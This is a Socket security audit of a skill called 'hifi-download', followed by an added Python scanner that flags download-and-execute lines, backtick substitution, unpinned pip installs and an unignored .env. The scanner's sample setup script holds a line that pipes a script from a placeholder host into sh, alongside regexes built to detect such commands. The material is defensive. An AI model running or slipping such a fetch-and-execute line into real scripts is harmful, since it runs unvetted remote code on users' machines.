hifi-download
Audited by Socket on Feb 21, 2026
1 alert found:
Malware [Skill Scanner]: natural-language instruction to download and install from a URL detected.

All findings:
  [CRITICAL] command_injection: Natural language instruction to download and install from URL detected (CI009) [AITech 9.1.4]
  [HIGH] command_injection: Backtick command substitution detected (CI003) [AITech 9.1.4] (reported 5 times)

Analysis: This skill's documentation and workflow are coherent with its stated purpose (music discovery and Hi-Res downloads). The main security concerns are supply-chain and operational: unpinned runtime installs from PyPI, reliance on an external tiddl CLI, and storing credentials in a local .env file. The supplied content contains no explicit malicious code or obfuscated payloads, and there is no immediate evidence of data exfiltration or backdoors. Treat this skill as moderately risky from a supply-chain and credential-handling perspective: before use, vet the setup scripts, pin dependencies (ideally with a lockfile and hashes), and make sure users keep .env out of version control.

LLM verification: No explicit malicious code or exfiltration is present in the provided skill documentation. The main risks are supply-chain and operational: the skill instructs users to run local shell scripts (contents not provided) and to install and use an external CLI (tiddl) for TIDAL, both of which require trust and review. Credentials are handled via a local .env file (expected), but users must ensure it is not committed and that the scripts are audited before execution. Recommend auditing the actual setup.sh/run.
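The audit above flags patterns (backtick substitution, download-and-install from a URL, unpinned PyPI installs, an untracked .env) without the setup script being available. The following is an added example of the kind of pre-execution check a reviewer could run once they have the script; it is not Socket's scanner and not code from the hifi-download skill. The rule IDs CI003 and CI009 are reused from the audit as labels, but the regexes, the UNPINNED rule, the sample setup.sh and the sample .gitignore are all constructed for this example.

```python
"""Added example: pre-execution audit of a skill's setup script and .gitignore.

Not Socket's scanner and not the skill's own code. Rule IDs CI003/CI009 are
borrowed from the audit as labels; the patterns are this example's assumptions.
"""
import fnmatch
import re
from typing import Dict, List

# Constructed sample setup.sh (the real one was not provided to the audit).
SAMPLE_SETUP_SH = """#!/bin/sh
VERSION=`python3 --version`
curl -sSL https://example.invalid/install.sh | sh
pip install tiddl
pip install requests==2.32.3 --require-hashes -r requirements.txt
TOKEN=`cat .env`
"""

# Constructed sample .gitignore that forgets to exclude .env.
SAMPLE_GITIGNORE = "__pycache__/\n*.pyc\n"

SEVERITY_ORDER = ["NONE", "LOW", "MEDIUM", "HIGH", "CRITICAL"]

# (rule id, severity, pattern). Patterns are illustrative, not Socket's rules.
RULES = [
    # download piped straight into a shell: curl ... | sh, wget ... | sudo bash
    ("CI009", "CRITICAL",
     re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(sudo\s+)?(ba|z)?sh\b")),
    # backtick command substitution
    ("CI003", "HIGH", re.compile(r"`[^`\n]+`")),
    # pip install with no version pin, no hash requirement and no -r file
    ("UNPINNED", "HIGH",
     re.compile(r"\bpip3?\s+install\s+(?!.*(==|--require-hashes|-r\s))[\w.\-]+")),
]


def scan_script(text: str) -> List[Dict[str, object]]:
    """Run every rule over every line; return one finding per match."""
    findings: List[Dict[str, object]] = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule_id, severity, pattern in RULES:
            for m in pattern.finditer(line):
                findings.append({"rule": rule_id, "severity": severity,
                                 "line": lineno, "match": m.group(0)})
    return findings


def env_is_ignored(gitignore_text: str, filename: str = ".env") -> bool:
    """True if .gitignore excludes `filename`. Last matching pattern wins,
    as in git; handles plain names, simple globs and '!' negations only."""
    ignored = False
    for raw in gitignore_text.splitlines():
        pat = raw.strip()
        if not pat or pat.startswith("#"):
            continue
        negate = pat.startswith("!")
        if negate:
            pat = pat[1:]
        pat = pat.lstrip("/").rstrip("/")
        if fnmatch.fnmatchcase(filename, pat):
            ignored = not negate
    return ignored


def audit(script: str, gitignore: str) -> Dict[str, object]:
    """Combine script findings with the .env check into one summary."""
    findings = scan_script(script)
    counts: Dict[str, int] = {}
    for f in findings:
        counts[str(f["rule"])] = counts.get(str(f["rule"]), 0) + 1
    highest = max((str(f["severity"]) for f in findings),
                  key=SEVERITY_ORDER.index, default="NONE")
    return {"findings": findings, "counts": counts,
            "highest": highest, "env_ignored": env_is_ignored(gitignore)}


if __name__ == "__main__":
    report = audit(SAMPLE_SETUP_SH, SAMPLE_GITIGNORE)
    for f in report["findings"]:
        print(f"[{f['severity']}] {f['rule']} line {f['line']}: {f['match']}")
    print("highest severity:", report["highest"])
    print(".env ignored by git:", report["env_ignored"])
```

Run it against the real setup.sh and run script once they are available; a CRITICAL download-and-install hit or an unignored .env is a reason to stop and read the script before executing it, not a reason to trust the tool's absence of hits.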